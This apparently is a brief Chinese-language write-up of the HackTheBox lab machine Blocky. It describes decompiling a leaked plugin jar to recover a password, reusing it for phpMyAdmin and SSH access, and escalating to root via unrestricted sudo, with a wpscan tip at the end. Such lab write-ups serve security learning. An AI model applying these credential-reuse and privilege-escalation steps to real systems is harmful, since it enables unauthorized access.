Blocky(源码泄露、java反编译)

在plugin目录下下载jar文件,unzip解压,jad反编译,获得一个口令

以/root/8YsqfCTnvxAUeduzjNSXe22,登录phpmyadmin成功。

1
2
3
ssh root@10.10.10.37
ssh Notch@10.10.10.37
ssh notch@10.10.10.37,成功

提权:

1
2
3
4
5
6
7
8
9
10
11
12
whoami 以notch普通用户登陆

sudo -l
响应,说明该用户可以运行任何命令
User notch may run the following commands on Blocky:
(ALL : ALL) ALL

groups notch 查看该用户所在的组,有sudo

notch : notch adm cdrom sudo dip plugdev lxd lpadmin sambashare

sudo su

以前用过该方式提权

总结

第一次尝试了java反汇编

wpscan可以使用不带参数的–enumerate,来枚举所有可能漏洞。